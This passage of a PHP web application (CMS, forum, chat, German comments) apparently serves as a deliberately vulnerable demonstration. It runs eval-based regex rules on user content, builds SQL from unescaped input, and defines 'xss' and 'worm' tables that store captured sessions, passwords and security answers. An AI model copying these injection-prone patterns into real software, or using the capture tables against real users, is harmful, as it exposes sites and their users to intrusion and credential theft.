: "content")." from [cms] where name like \"$1\" and status/2%4 <= ".($status/2%2 + $status%2*2))) : ""'
),
'comment'=> array('/.*/s' => ''),
'creole'=> array('/^([<^>]|&[lg]t;)?\s*(\d+%?)?\s*(@)?([+|-])?\s*(.+?)$/es' => '($x = array("$1","$2","$3","$4","$5",
array("/(?<=&)([gl])t(?=;)/e","/\\\\\\\\\\\'|(&#?\w+;)|(?![\x80-\xff])[[:punct:]]|(?<=[a-z\d])[A-Z]/e","/\r?\n/",
"/(\\\\\\\\\\\\\|&#92;)n/"),array("((\"\\$1\"==\"l\")?\"#60\":\"#62\")","((\"\\$1\")?\"\\$1\":\"&#\"
.ord(substr(\"\\$0\",-1)).\";\")","<br />","&#10;"),
"<td class=\"cc\" onclick=\'cc(this,1,?)\' ondblclick=\'cc(this,0,?)\'>\n<>\n<!----></td></tr>",
(!isset($head["creole"]) and $head["creole"]=\'<script type="text/javascript"><!--
'
.'function cc(x,y,z){y=[y,x.getElementsByTagName("textarea")[0]];if(!y[0] && y[1])x.innerHTML=y[1].value;if(!y[1]&&y[0])'
.'x.innerHTML="<textarea cols=\"80\" rows=\"10\" style=\"width:100%;height:"+x.clientHeight+"\""+((z)?"":" readonly")+">"'
.'+x.innerHTML+"<\/textarea>";}'."//--></script>\n<style type=\"text/css\"><!--
td.cc:hover{background-color:FloralWhite;border-color:red}--></style>'))) ? eval('"
.'$y = "<table".(($x[0])
? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),array("left","center","right")," align=`$x[0]`") : "")
.(($x[1]) ? " width=`$x[1]`" : "")." border=`1` class=`crd`>"; foreach((($x[3] == "+") ? explode("\n",$x[4])
: array($x[4])) as $z) $y .= "<tr><td><pre style=`white-space:pre-wrap;word-break:break-all`>"
.preg_replace($x[5],$x[6],$z)."</pre></td>".(($x[3] == "-") ? "</tr><tr>" : "").strtr($x[7],array("?" => (($x[2]) ? 1 : 0),
"<>" => strtr($z,array("\\\\\\\\\n" => "\n")))); return strtr($y,array("`" => "\\\'"))."</table>";\') : 0'
),
'div' => array('/^([#.]?)(\w+)\s*(.*)/es' => '"<div ".(("$1" == "#") ? "id" : "class")."=\"$2\">$3</div>"'),
'file' => array('/^(\d+)-(.+)$/e' => '($creolevar = array_merge($creolevar,(($x = $sql["aq"]($conn,"select f.id as upid, '
.'strftime(\"%s\",f.[create]) as uptime, f.status/2%2 as upstatus, f.status%2 as upright, u.username as upuser, '
.'f.name as upname, f.info as upinfo, abs(f.size) as upsize, f.hash as uphash, f.type as uptype from [file] as f '
.'left join [user] as u on u.id = f.user where f.user = $1 and f.name like \'$2\' and f.status is not null",SQLITE_ASSOC))
? reset($x) : array()))) ? "" : ""'
),
'hide' => array('/^([^|_\n]*)(\||_)?\s*(.+)$/es' => '\'<div id="c\'.($x=((!isset($creolevar[".hc"]) and $head["hide"]=
\'<style type="text/css"><!--'
."\n.ch{color:blue;margin-bottom:0px;text-decoration:underline}p.ch{margin-top:0px}--></style>
<script type=\"text/javascript\"><!--\n"
.'function hidecontent(x){x=document.getElementById("c"+x);'
.'y=x.getElementsByClassName("cb")[0];z=x.getElementsByClassName("ch")[0];w=(y.style.display=="none")?["block","&raquo;"]'
.':["none","&laquo;"];y.style.display=w[0];z.innerHTML=z.innerHTML.replace(/.$/,w[1])}//--></script>\')'
.'?($creolevar[".hc"]=1):(++$creolevar[".hc"]))).\'"><p class="ch" onclick="hidecontent(\'.$x.\')" title="Ein/Ausblenden">'
.'$1 &\'.(($x=("$2"=="|"))?"r":"l").\'aquo;</p><div class="cb"\'.(($x)?"":\' style="display:none"\').\'>$3</div></div>\''),
'sort' => array('/^([ir]+(?=\s))?\s*(.+)$/es' => '($x = array("$1","$2")) ? eval(\'
$y = explode("\\n",$x[1]);if(preg_match("/i/",$x[0]))natcasesort($y);else natsort($y);
if(preg_match("/r/",$x[0]))$y = array_reverse($y);return join("\n",$y);\') : 0'
),
'unutf' => array('/[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3}|[\xf8-\xfb][\x80-\xbf]{4}|[\xfc-\xfd][\x80-\xbf]{5}|[\xfe][\x80-\xbf]{6}/e' =>
'($x = "$0") ? eval(\'for($y = ord($x{0}) % (1 << 7 - strlen($x)), $z = 1; $z < strlen($x); $z++) $y = $y * 64 + (ord($x{$z}) & 63); return "&#$y;";\') : 0',),
'toutf' => array('/[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3}|[\xf8-\xfb][\x80-\xbf]{4}|[\xfc-\xfd][\x80-\xbf]{5}|[\xfe][\x80-\xbf]{6}|([\x80-\xff])/e' =>
'($x = ord("$1") or $y = "$0") ? eval(\'if($x) { $y = ""; $z = 6;
while($x >= 1 << $z and --$z) { $y = chr($x % 64 | 128).$y; $x = $x / 64 | 0; } $y = chr((1 << 7 - $z) -1 << ++$z | $x).$y; } return $y;\') : 0'
,),
);
$creolepi = array( // <<Plugin ...>> # Späte Erweiterungen mit Parameter Übergabe ($z) / Addons
'comment'=>'0;', // Kommentar
'time' => 'time', // Timestamp ausgeben
'rot13' => array('str_rot13',0), // Rot 13 (de)kodieren
'lower' => array('strtolower',0), // Kleinschreiben
'upper' => array('strtoupper',0), // Grossschreiben
'ucword'=> array('ucwords',0), // Alle Erste Buchstaben gross
'ucfirst'=>array('ucfirst',0), // Erster Buchstabe Gross
'date' => array('date',array('fmt','time?')), // Time Formatiert ausgeben
'ftime' => array('strftime',array('fmt','time?')), // Time Formatiert ausgeben
'wordwrap'=>array('wordwrap',array('str','width','break?')),// Wortumbruch nach x Zeichen
'span' => array('return "<span class=\'".preg_replace("/[^\w-]+/","",$z[class])."\'>$z[text]</span>";',array('class','text')),
'style' => array('return "<span style=\'".preg_replace("/[^\s\w{}%@#;:.,_-]+/","",$z["style"])."\'>$z[text]</span>";',array('style','text')),
'note' => array('$z = array_values($z); if(isset($z[0]) and preg_match("/^\w+$/",$z[0])) { $x = $z[0]; $y = (isset($z[1]))'
.'? $z[1] : false;} else { $x = "note"; $y = (isset($z[0])) ? $z[0] : false; } $z = array($x);'
.'$x = &$creolevar[".fn$z[0]"]; if($y) { if(isset($x[$y])) $z[1] = $x[$y]; else { $z[1] = count($x);'
.'$x[$y] = $z[1]; } unset($x); return "<sup>[<a href=\"#$z[0]\">".($z[1]+1)."</a>]</sup>"; } else {'
.'$y = array(); foreach($x as $z[2] => $z[3]) $y[] = "<li>$z[2]"; $x = array(); unset($x); return'
.'(count($y)) ? "<a name=\"$z[0]\"></a><ol>".implode("",$y)."</li></ol>" : ""; }',array('key?','src?')),
'font' => array('return "<font".((isset($z["color"]))?" color=\"$z[color]\"":"").((isset($z["face"]))?" face=\"$z[face]\"":"")'
.'.((isset($z["size"])) ? " size=\"$z[size]\"" : "").">$z[text]</font>";',array('text','color?','face?','size?')),
'anker' => array('$x = ""; if(isset($z["name"]) and isset($creolevar[".al"]) and count($creolevar[".al"])) {'
.'foreach($creolevar[".al"] as $x => $y) $creolevar[".al"][$x] = "<a class=\"anchor\" href=\"#$x\">$y</a>";'
.'$x = (isset($z["type"]) and preg_match("/([1ai])|([cdns])/i",$z["type"],$x)) ? (($x[1]) ? "ol type=\"$x[1]\""'
.': strtr("ul type=\"$x[2]\"",array("d" => "disc", "c" => "circle", "s" => "square", "n" => "none"))) : "ul";'
.'if(isset($z["type"]) and preg_match("/o(r?)/",$z["type"],$y)) { natsort($creolevar[".al"]);'
.'if(isset($y[1]) and $y[1]) $creolevar[".al"] = array_reverse($creolevar[".al"]); }'
.'$y = array((isset($z["align"])) ? " align=\"$z[align]\"" : "",(isset($z["class"]))'
.'? " class=\"$z[class]\"" : ""); $x = "<table$y[0]$y[1]><tr><td><fieldset><legend>$z[name]</legend><$x$y[1]><li>"'
.'.implode("<li>",$creolevar[".al"])."</li></".substr($x,0,2)."></fieldset></td></tr></table>";'
.'unset($creolevar[".al"]);} return $x;',array('name?','align?','type?','class?')),
'frame' => array('return ($creolevar["type"] == "cms") ? "<iframe src=\'$z[src]\' width=\'$z[width]\' height=\'$z[height]\'"'
.'.((isset($z["option"]) and preg_match("/(left|right)?,?([10])?/",$z["option"],$x)) ? ((isset($x[1]))'
.'? " align=\'$x[1]\'" : "").((isset($x[2])) ? " frameborder=\'$x[2]\'" : "") : "")."><a href=\"$z[src]\" '
.'rel=\"nofollow\" target=\"_blank\">$z[src]</a></iframe>" : $z["src"];',array('src','width','height','option?')),
'script'=> array('if($creolevar["type"] == "cms") { $y = "<script type=\"text/javascript\" src=\"$z[src]\"></script>";'
.'if(isset($z["head"]) and $z["head"]) $head[$z["head"]] = $y; else return $y; };',array('src','head?')),
'debug' => '$debug["<<debug>>"][] = array("x" => $x, "y" => $y, "z" => $z); if($z) return implode(" ",$z);',
// 'eval' => array('eval',1), // That's evil and didn't work!
);

# Tabellen Sortierlinks erstellen
$sorth = array(array(
'/\((.*?)\)/e',
'/\{(.*?)\}/e',
'/([^\t=]+)=(\d+)/e',
'/(?<=^|\t)([^\t]+)(?=\t|$)/'),array(
'($status/2%2) ? "$1" : ""',
'($status%2) ? "$1" : ""',
'"<a href=\"$self/$request?sort=".(($sort and $sort > 0 and $2 == $sort) ? "-" : "")."$2\">$1</a>"',
'<th>$1</th>'),
'/^([^;]+);(\d+)(?:;(.+))?$/e',
"'\n\torder by '.((\$sort and abs(\$sort) <= \$2) ? abs(\$sort).((\$sort < 0 )? ' desc' : '').(('$3' != '') ? ',$3' : '') : '$1')");

# Fehlerhafte Formulare hervorheben
$formcheck = array(
'/\{(\w+)(?:,(\w+))?\|([^|]+)\|(\*?)(\d+)(?:\|(\d+))?(?:\|(\w+)=([^|}]+))?(?:\|(\w+)=([^|}]+))?\}/e',
"'<small>'.((count(\$_POST) and (substr('$3',0,1) == '*' and isset(\$post) and (!isset(\$post['$1'])
or '$2' and !(isset(\$post['$2']) and \$post['$1'] == \$post['$2'] and \$post['$1'] and \$post['$2']))))
? '<font color=\"#ff0000\">$3</font>' : '$3').'</small><br /><input type=\"'.(('$4') ? 'password' : 'text')
.'\" name=\"$1\" size=\"$5\" '.(('$6') ? 'maxlength=\"$6\" ' : '').(('$7' and '$8') ? '$7=\"$8\" ' : '')
.(('$9' and '$10') ? '$9=\"$10\" ' : '').'value=\"'.((isset(\$post['$1'])) ? \$post['$1'] : '').'\" />'"
);

# Lange Suchergebnisse in Unterseiten einteilen (Paging)
$paging = array(1,10,100,5,10,"/(\d+)\D+(\d+)[^<]+(.+)/e",'eval(\' // Paging Function ($num, $max, $link)
$now = max(1,min(((preg_match("/^(\d+)/",$page[0],$val)) ? $val[1] : ceil($1/$2)),ceil($1/$2)));
if($1 > $2 and $2 > 0) { $end = ceil($1/$2); $now = min(max(1,$now),$end); $line = array(1 => "1-$2",
$now => (($now-1) * $2+1)."-".($now * $2), $end => (($end-1) * $2+1).((($end-1) * $2+1 < $1) ? "-$1 " : ""));
$wrt = 1; while($wrt < $end) { for($a = 1; $a <= $paging[3]; $a++) if(($wrt * $a) <= $end) {
if(($val = $now - $now % $wrt + $wrt * $a) < $end) $line[$val] = (($val-1) * $2+1)."-".($val * $2);
if(($val = $now - $now % $wrt - $wrt * $a) > 0) $line[$val] = (($val-1) * $2+1)."-".($val * $2); }
$wrt *= $paging[4]; } ksort($line); } else $line = array(1 => "1".(($1 > 1) ? "-$1 " : "" ));
$val = ($page[0] != "," or ($1 - ($now-1) * $2) > $2) ? ($now-1) * $2 : max($1 - $2,0); $code = ($2 != $paging[1])
? ",$2" : ""; foreach($line as $key => $var) { if(preg_match("/(\d+)-?(\d*)/",$var,$wrt)) $var = $wrt[1]
.(($wrt[2] != "") ? " - ".$wrt[2] : ""); $line[$key] = ($key == $now) ? "<span title=\"$var\">$key</span>"
: strtr("$3",array("#key#" => $key, "#var#" => $var, "#max#" => $code)); } $code = ""; if(count($line) > 1) {
if($now > 1) $code .= preg_replace("/>\d+</",">&lt;&lt;<",$line[$now-1])." | "; $code .= implode(" | ",$line);
if($now < ceil($1/$2)) $code .= " | ".preg_replace("/>\d+</",">&gt;&gt;<",$line[$now+1]); } return $code;\')'
);

# Per JavaScript Elemente verstecken/wiederherstellen
$jshide = array('/^(\w+)([;,])(\d+)$/e','strtr(preg_replace($js,"",\'
z = ("$2" == ",") ? ["none","block"] : ["block","none"];
document.getElementById("$1").style.display = (y = document.getElementById("$1").style.display == z[0])
? z[1] : z[0]; document.cookie = "hide=" + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<$3)) + (1<<$3) * ((y) ? 0 : 1) : 1<<$3) + "; path=\'.$self.\'";
return false;\'),array("&" => "&amp;"))'
);

# Grafikdaten
$img = Array( 0 => 35, ':-)' => 182, ';-)' => 173, '8-|' => 205, ':;-(' => 185, ':;-D' => 192,
':;-|' => 179, ':;-?' => 183, 'B8-)' => 194, '8-Oo' => 190, ':;-Cc' => 203, ':;-Oo' => 193,
':;-Xx' => 193, ':;-Ppb' => 187,'~-~' => 975, 'ico' => 326, 1 => "
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"
);

# Datenbank-Tabellen
$sql[0] = "
CREATE TABLE [chat] (
[id] INTEGER NOT NULL PRIMARY KEY,
[user] INTEGER NOT NULL,
[time] TIMESTAMP NOT NULL,
[chat] VARCHAR(8) NOT NULL,
[text] VARCHAR(255) NOT NULL);
CREATE TABLE [cms] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NOT NULL,
[name] VARCHAR(40) NOT NULL UNIQUE,
[description] VARCHAR(255) NULL,
[content] TEXT NULL);
CREATE TABLE [file] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[status] INTEGER NULL DEFAULT '1',
[user] INTEGER NOT NULL,
[name] VARCHAR(64) NOT NULL,
[ip] VARCHAR(40) NOT NULL,
[useragent] VARCHAR(255) NULL,
[info] VARCHAR(255) NULL,
[link] INTEGER NULL,
[size] INTEGER NULL,
[hash] VARCHAR(8) NULL,
[type] VARCHAR(40) NULL,
[data] TEXT NULL);
CREATE TABLE [forum] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NULL DEFAULT '0',
[userid] INTEGER NOT NULL DEFAULT '0',
[mailid] INTEGER NULL,
[path] VARCHAR(255) NULL,
[ip] VARCHAR(40) NOT NULL,
[useragent] VARCHAR(255) NULL,
[title] VARCHAR(255) NULL,
[message] TEXT NOT NULL);
CREATE TABLE [user] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[logins] INTEGER NOT NULL DEFAULT '0',
[requests] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NULL DEFAULT '1',
[chat] VARCHAR(8) NULL,
[username] VARCHAR(64) NOT NULL UNIQUE,
[password] VARCHAR(64) NOT NULL,
[forename] VARCHAR(64) NOT NULL,
[lastname] VARCHAR(64) NOT NULL,
[mail] VARCHAR(255) NOT NULL UNIQUE,
[passhelp] VARCHAR(255) NULL,
[ip] VARCHAR(40) NULL,
[session] VARCHAR(64) NULL,
[useragent] VARCHAR(255) NULL,
[page] VARCHAR(255) NULL,
[info] VARCHAR(255) NULL,
[town] VARCHAR(64) NULL,
[born] DATE NULL,
[tagline] VARCHAR(255) NULL,
[profil] TEXT NULL);
CREATE TABLE [worm] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[referer] VARCHAR(255) NOT NULL,
[Benutzer-ID] VARCHAR(8) NOT NULL UNIQUE,
[Logins] VARCHAR(8) NULL,
[Zugriffe] VARCHAR(8) NULL,
[Aenderungen] VARCHAR(8) NULL,
[Forumbeitraege]VARCHAR(8) NULL,
[Blog] VARCHAR(8) NULL,
[Mailverkehr] VARCHAR(8) NULL,
[Chat-Texte] VARCHAR(8) NULL,
[Dateien] VARCHAR(8) NULL,
[Datei-Freiraum]VARCHAR(20) NULL,
[Status] VARCHAR(8) NULL,
[Rechte] VARCHAR(8) NULL,
[Erstanmeldung] VARCHAR(20) NULL,
[Letzter_Besuch]VARCHAR(20) NULL,
[Letzte_Aktion] VARCHAR(20) NULL,
[Benutzername] VARCHAR(64) NULL,
[Kennwort] VARCHAR(64) NULL,
[Vorname] VARCHAR(64) NULL,
[Nachname] VARCHAR(64) NULL,
[eMail] VARCHAR(255) NULL,
[Homepage] VARCHAR(255) NULL,
[Wohnort] VARCHAR(64) NULL,
[Chat-Status] VARCHAR(255) NULL,
[Geburtstag] VARCHAR(64) NULL,
[Sicherheitsfrage] VARCHAR(96) NULL,
[Geheim-Antwort] VARCHAR(96) NULL,
[Bildschirm] VARCHAR(64) NULL,
[IP-Adresse] VARCHAR(40) NULL,
[SessionID] VARCHAR(64) NULL,
[Browser] VARCHAR(255) NULL);
CREATE TABLE [xss] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[ip] VARCHAR(40) NOT NULL,
[href] VARCHAR(255) NOT NULL,
[data] VARCHAR(255) NULL,
[sess] VARCHAR(255) NULL,
[user] VARCHAR(255) NULL,
[pass] VARCHAR(255) NULL,
[useragent] VARCHAR(255) NULL);"
;
$sql[1] = " Array_Query Changes CLose
Create_Function ERror_String Escape_String Exec
Fetch_Array Field_Name Last_Error LibenCoding
LibVersion Master Num_Fields Open
Query Single_Query"
;

# Erste Initialisierungen
$eos = 60; // Sessiondauer bei inaktivität (Min)
$taz = 24; // Anzahl der TextArea-Zeilen
$flc = 5; // Anzahl der erlaubten Fehllogins
$ctl = 31557600; // 1*365.25*24*60*60 // Maximale Speicherdauer von Cookies
$wrt = true; // Datenbankstruktur überprüfen
$stc = "FireBrick"; // StyleSheet Title-Color
$rel = " rel='nofollow'"; // Suchmaschinen sollen Link ignorieren
$tgb = " target='_blank'"; // Neues Fenster bei Externen Links
$sel = " class='self'"; // Klasse für Eigenlinks
$atk = "$rel class='leak'"; // Klasse für Angrifflinks
$lock = '&#9911;'; # '&#128274;'; // Schloss-Zeichen
$info = array_fill(0,9,""); // Platzhalter für Dynamische Infos
$dpsk = '/^(lua|src|uid|sha|flc)$/'; // Sessionfilter
$addr = $_SERVER['REMOTE_ADDR']; // IP vom Benutzer
$time = filemtime(__FILE__); // Datum des Scriptes
$date = date("d.m.Y",$time); // Änderungsdatum
$wiki = 'https://de.wikipedia.org/wiki';// Wikipedia-Links
$debug = $head = array(); // Debug & HTML-Header initialisieren
$maxfile = 512 * 1024; // Maximale Upload-Größe
$register = false; // CMS-Infotest für neuanmeldung
$local = '/^(1(0|27|69\.254|72\.(1[6-9]|2\d|3[01])|92\.168)\.|::1)/'; // Lokalzugriff
$gqs = (isset($_SERVER['QUERY_STRING'])) ? $_SERVER['QUERY_STRING'] : ""; // Query-String
$ncms = '(Abmelden|CMS|Datei|Mail|Profil|Suche)'; // Mit diesen Namen keine CMS-Seiten anlegen
$type = explode(',',',7z,asc,bmp,bpg,csv,gz,ico,jpe,jpeg,jpg,jp2,j2k,mp4,ogg,pdf,png,rtf,svg,tar,tgz,tif,tiff,txt,webp,zip'); // Erlaubt Dateitypen
preg_match('/(.{18})(.+)/',str_pad(0,44,',0'),$sij); // Angriffs-Padding für SQL-Injection
$self = preg_replace('!^[^/]+!','',$_SERVER['SCRIPT_NAME']); // Link zum Script
$Self = ($a = explode(',',(isset($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') ? '443,s' : '80,'))
?
"http$a[1]://$_SERVER[HTTP_HOST]".((":$a[0]" != ($a = ":$_SERVER[SERVER_PORT]") and $a != substr($_SERVER['HTTP_HOST'],-strlen($a))) ? $a : "").$self : '';
if(
$config and file_exists($config)) // Alternative Konfig-Datei
@include $config; // Konfig-Daten laden
if(isset($cfg)) // Dynamische Variabeln ersetzen
extract($cfg); // foreach($cfg as $key => $var) $GLOBALS[$key] = $var;
if(isset($CFG)) // Dynamische Variabeln erweitern
foreach($CFG as $key => $var)
foreach(
$var as $k => $v)
$GLOBALS[$key][$k] = $v;
$uid = false; // Keine Benutzer-ID
$status = 0; // Keine Rechte
$author = "<a href='http://www.mengelke.de/'$tgb>Michael Engelke</a>";
$q = (isset($_GET['q'])) ? $_GET['q'] : ((isset($_GET['b'])) ? base64_decode(strtr($_GET['b'],array(' ' => '+', '-' => '+', '_' => '/'))) : false);
$s = (isset($_GET['s']) and preg_match('/^[bcdfm]$/',$_GET['s'],$var)) ? $var[0] : false;
$id = (isset($_GET['id']) and preg_match('/\d+/',$_GET['id'],$var)) ? $var[0] : false;
$mid = (isset($_GET['user']) and preg_match('/-?\d+/',$_GET['user'],$var)) ? $var[0] : false;
$sort = (isset($_GET['sort']) and preg_match('/-?\d+/',$_GET['sort'],$var)) ? $var[0] : false;
$mode = (isset($_REQUEST['mode']) and preg_match('/\w+/',$_REQUEST['mode'],$var)) ? $var[0] : false;
$path = (isset($_SERVER['PATH_INFO'])) ? $_SERVER['PATH_INFO'] : ((preg_match('!'.preg_quote(basename(__FILE__),'!').'(/[^?#]+)!',$_SERVER['REQUEST_URI'],$var)) ? $var[1] : ((isset($_REQUEST['PATH_INFO'])) ? $_REQUEST['PATH_INFO'] : null));
$request = (isset($_REQUEST['request'])) ? preg_replace('/[^\w.-]/','',$_REQUEST['request'])
: ((
$path and preg_match('/^\/([\w.-]+)/',$path,$var)) ? $var[1] : false);
$query = (isset($_REQUEST['PATH_INFO'])) ? preg_replace('/^[^&]*./','',$gqs) : $gqs;
$phtml = array(preg_replace(array('/&/','/.+/'),array('&(?!(\w+|#\d+|#x[\da-f]+);)','/$0/i'),array_keys($html)),array_values($html));
$uedit = false;
$array = array(&$attack,&$hash,&$jschat['crypt']); // Alle Externen Links in Lokale umwandeln, wenn sie existieren
